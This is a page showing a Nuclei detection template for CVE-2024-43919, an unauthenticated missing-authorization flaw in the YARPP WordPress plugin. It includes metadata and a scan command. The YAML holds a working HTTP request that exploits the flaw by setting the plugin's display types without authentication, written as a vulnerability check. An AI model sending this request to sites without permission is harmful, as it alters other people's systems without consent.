Skip to content
Nuclei Templates

YARPP <= 5.30.10 - Missing Authorization

ID: CVE-2024-43919

Severity: critical

Author: s4e-io

Tags: cve,cve2024,wp,wordpress,wp-plugin,auth-bypass,yet-another-related-posts-plugin

Description

Section titled “Description”

The YARPP Yet Another Related Posts Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check in the ~/includes/yarpp_pro_set_display_types.php file in all versions up to, and including, 5.30.10. This makes it possible for unauthenticated attackers to set display types.

YAML Source

Section titled “YAML Source”
id: CVE-2024-43919


info:
  name: YARPP <= 5.30.10 - Missing Authorization
  author: s4e-io
  severity: critical
  description: |
    The YARPP Yet Another Related Posts Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check in the ~/includes/yarpp_pro_set_display_types.php file in all versions up to, and including, 5.30.10. This makes it possible for unauthenticated attackers to set display types.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-43919
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yet-another-related-posts-plugin/yarpp-53010-missing-authorization
    - https://patchstack.com/database/vulnerability/yet-another-related-posts-plugin/wordpress-yet-another-related-posts-plugin-yarpp-plugin-5-30-10-broken-access-control-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43919
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43919
    cwe-id: CWE-862
    epss-score: 0.00091
    epss-percentile: 0.40377
    cpe: cpe:2.3:a:yarpp:yet_another_related_posts_plugin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: yarpp
    product: yet_another_related_posts_plugin
    framework: wordpress
    fofa-query: body="wp-content/plugins/yet-another-related-posts-plugin/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,auth-bypass,yet-another-related-posts-plugin


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/plugins/yet-another-related-posts-plugin/")'
        internal: true


  - raw:
      - |
        GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 2'
          - 'contains(body, "ok")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100dafe57a3f611edc1dea81a59db1ebaa79d3860c8f822fadd3d69e5812ca8f5e002202fc03a83baaca1896a4244c38ffc1846e2ad529224c8c26c123d15152fca39d4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-43919.yaml"

View on Github